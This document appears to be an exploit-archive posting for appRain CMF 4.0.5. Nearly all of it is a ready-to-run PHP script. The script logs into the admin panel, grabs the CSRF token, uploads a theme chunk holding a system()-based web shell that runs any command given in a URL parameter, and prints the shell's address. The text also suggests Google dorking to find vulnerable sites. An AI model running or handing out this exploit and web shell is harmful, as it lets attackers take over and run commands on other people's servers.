=============================================================================================================================================
| # Title     : appRain CMF 4.0.5 shell upload Vulnerability                                                                                |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
| # Vendor    : https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip                                                             |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: The script performs an attack on a website's control panel by exploiting CSRF vulnerabilities and uploading a shell via the website's administrative interface.

   (Related : https://packetstorm.news/files/id/178895/ Related CVE numbers:  ) .
	
[+] save code as poc.php.

[+] Usage: php exploit.php sitename.com username password

[+] PayLoad :

<?php
if ($argc < 4) {
    echo "Usage: php script.php <url> <username> <password>\n";
    exit(1);
}

$base_url = $argv[1];
$username = $argv[2];
$password = $argv[3];

$session = curl_init();

$login_url = $base_url . '/admin/index.php?id=dashboard';
$login_data = [
    'login' => $username,
    'password' => $password,
    'login_submit' => 'Log+In'
];

$filename = substr(str_shuffle('abcdefghijklmnopqrstuvwxyz0123456789'), 0, 5);

echo "Logging in...\n";
curl_setopt($session, CURLOPT_URL, $login_url);
curl_setopt($session, CURLOPT_POST, true);
curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($session, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($session);

if (strpos($response, 'Dashboard') !== false) {
    echo "Login successful\n";
} else {
    echo "Login failed\n";
    exit();
}

sleep(3);

$edit_url = $base_url . '/admin/index.php?id=themes&action=add_chunk';
curl_setopt($session, CURLOPT_URL, $edit_url);
$response = curl_exec($session);

preg_match('/input type="hidden" id="csrf" name="csrf" value="(.*?)"/', $response, $matches);
if ($matches) {
    $token = $matches[1];
} else {
    echo "CSRF token could not be found.\n";
    exit();
}

$content = '
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER[\'PHP_SELF\']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET[\'cmd\']))
{
    system($_GET[\'cmd\']);
}
?>
</pre>
</body>
</html>
';

$edit_data = [
    'csrf' => $token,
    'name' => $filename,
    'content' => $content,
    'add_file' => 'Save'
];

echo "Preparing shell...\n";
curl_setopt($session, CURLOPT_URL, $edit_url);
curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($edit_data));
$response = curl_exec($session);
sleep(3);

if (curl_getinfo($session, CURLINFO_HTTP_CODE) == 200) {
    echo "Your shell is ready: " . $base_url . "/public/themes/default/{$filename}.chunk.php\n";
} else {
    echo "Failed to prepare shell.\n";
}
?>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================